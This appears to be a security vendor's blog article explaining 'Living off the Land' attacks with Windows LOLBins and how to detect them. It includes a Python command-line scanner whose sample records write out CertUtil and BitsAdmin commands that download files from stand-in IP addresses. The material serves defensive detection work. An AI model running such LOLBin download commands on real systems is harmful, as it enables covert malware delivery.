Hiding in Plain Sight
Why bring a custom virus that might get caught by antivirus, when the computer already has tools that can do the same damage? "Living off the Land" is the digital equivalent of a burglar using the homeowner's own ladder to break in.
How It Works
Attackers use what are known as LOLBins (Living Off the Land Binaries). These are binaries supplied by the operating system that are normally used for legitimate purposes but can be abused.
Common LOLBins
- PowerShell: Used by admins for automation; used by attackers to download and execute code in memory.
- WMI (Windows Management Instrumentation): Used for system management; used by attackers for lateral movement and persistence.
- CertUtil: Used to manage certificates; used by attackers to download files from the web.
- BitsAdmin: Used for background file transfers; used by attackers to download malware.
Why Traditional Security Fails
Legacy antivirus looks for "bad files." In a LotL attack, there is no bad file. The attacker is running `powershell.exe`, which is a trusted, signed Microsoft binary. To the antivirus, this looks like a system administrator doing their job.
Detection & Mitigation
Since you can't block PowerShell (it would break IT operations), you must monitor how it is used.
- Behavioral Analysis (UEBA): Analyzing the command-line arguments rather than the binary. Is PowerShell running an encoded string? Is it connecting to a raw IP address?
- EDR (Endpoint Detection & Response): Modern EDR agents hook into the OS kernel to see what these tools are actually doing in memory.
- Application Whitelisting: Restricting which binaries can execute, though LOLBins often bypass this since they are whitelisted by default.
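The command-line checks described above, as an added example that is not part of the original article or Alterra's product: a small Python scanner over constructed process-creation records (image path plus command line, the shape an EDR agent or Sysmon Event ID 1 would supply) that flags PowerShell encoded commands (decoding them from their UTF-16LE base64 form), CertUtil and BitsAdmin used as downloaders, and URLs whose host is a raw IP address. The sample records and the 203.0.113.x / 198.51.100.x addresses are constructed test data.

```python
import base64
import re
import shlex

# Constructed process-creation records (image path + command line), in the
# shape an EDR agent or Sysmon Event ID 1 would supply. Sample data only.
ENC = base64.b64encode("Write-Host 'hi'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + ENC},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/t.bin t.bin"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer j /download http://198.51.100.7/a.dat C:\\Users\\Public\\a.dat"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\Backup-Logs.ps1"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify server.cer"},
]

# A URL whose host is a bare IPv4 address rather than a hostname.
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.IGNORECASE)

def analyze(event):
    """Return (finding, detail) tuples for one process-creation record."""
    exe = event["image"].rsplit("\\", 1)[-1].lower()
    raw = shlex.split(event["cmdline"], posix=False)[1:]  # drop argv[0]
    args = [a.lower() for a in raw]                       # case-insensitive switches
    findings = []
    if exe == "powershell.exe":
        for i, a in enumerate(args):
            # -EncodedCommand may be abbreviated to any prefix (-e, -enc, ...) or to -ec.
            if (a == "-ec" or (len(a) >= 2 and "-encodedcommand".startswith(a))) and i + 1 < len(raw):
                try:  # PowerShell encodes the script as base64 over UTF-16LE text
                    findings.append(("encoded_command", base64.b64decode(raw[i + 1]).decode("utf-16le")))
                except ValueError:  # bad base64 padding or invalid UTF-16
                    findings.append(("encoded_command", "<undecodable>"))
    elif exe == "certutil.exe" and "-urlcache" in args:
        findings.append(("downloader", exe))
    elif exe == "bitsadmin.exe" and "/transfer" in args:
        findings.append(("downloader", exe))
    m = RAW_IP_URL.search(event["cmdline"])
    if m:
        findings.append(("raw_ip_url", m.group(0)))
    return findings

def scan(events):
    """Map record index -> findings, keeping only records that raised one."""
    results = {}
    for i, e in enumerate(events):
        hits = analyze(e)
        if hits:
            results[i] = hits
    return results

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], hits)
```

The two legitimate records (a scheduled backup script and a certificate check) produce no findings, which is the point: the binary is identical in every case, only the arguments separate the administrator from the attacker.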
Alterra's Perspective
We design our defense software assuming LotL attacks will happen. We employ strict constrained language modes for scripting engines and enforce Just Enough Administration (JEA) principles to limit what built-in tools can do, even if an attacker gains access to them.